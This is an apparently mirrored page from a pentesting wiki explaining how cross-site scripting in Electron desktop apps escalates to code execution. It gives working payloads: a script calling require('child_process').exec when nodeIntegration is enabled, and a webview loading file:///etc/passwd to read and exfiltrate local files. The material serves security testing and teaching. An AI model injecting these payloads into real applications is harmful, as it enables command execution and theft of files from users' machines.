mirror of
https://github.com/carlospolop/hacktricks
synced 2025-01-07 18:58:54 +00:00
47 lines
1.7 KiB
Markdown
47 lines
1.7 KiB
Markdown
# XSS to RCE Electron Desktop Apps
|
|
|
|
Recommended read for more trick: [https://mksben.l0.cm/2020/10/discord-desktop-rce.html?m=1](https://mksben.l0.cm/2020/10/discord-desktop-rce.html?m=1)
|
|
|
|
When I test Electron app, first I always check the options of the [BrowserWindow API](https://www.electronjs.org/docs/api/browser-window), which is used to create a browser window. By checking it, I think about how RCE can be achieved when arbitrary JavaScript execution on the renderer is possible.\
|
|
Example:
|
|
|
|
```
|
|
const mainWindowOptions = {
|
|
title: 'Discord',
|
|
backgroundColor: getBackgroundColor(),
|
|
width: DEFAULT_WIDTH,
|
|
height: DEFAULT_HEIGHT,
|
|
minWidth: MIN_WIDTH,
|
|
minHeight: MIN_HEIGHT,
|
|
transparent: false,
|
|
frame: false,
|
|
resizable: true,
|
|
show: isVisible,
|
|
webPreferences: {
|
|
blinkFeatures: 'EnumerateDevices,AudioOutputDevices',
|
|
nodeIntegration: false,
|
|
preload: _path2.default.join(__dirname, 'mainScreenPreload.js'),
|
|
nativeWindowOpen: true,
|
|
enableRemoteModule: false,
|
|
spellcheck: true
|
|
}
|
|
};
|
|
```
|
|
|
|
## nodeIntgration RCE
|
|
|
|
If the nodeIntegration is set to true, a web page's JavaScript can use Node.js features easily just by calling the `require()`. For example, the way to execute the calc application on Windows is:
|
|
|
|
```
|
|
<script>
|
|
require('child_process').exec('calc');
|
|
</script>
|
|
```
|
|
|
|
## Read Arbitrary Internal FIle
|
|
|
|
If contextIsolation set to false you can try to use \<webview> (similar to \<iframe> butcan load local files) to read local files and exfiltrate them: using something like **\<webview src=”file:///etc/passwd”>\</webview>:**
|
|
|
|
![](<../../.gitbook/assets/1 u1jdRYuWAEVwJmf_F2ttJg.png>)
|
|
|
|
**(Trick copied form **[**here**](https://medium.com/@renwa/facebook-messenger-desktop-app-arbitrary-file-read-db2374550f6d)**).**
|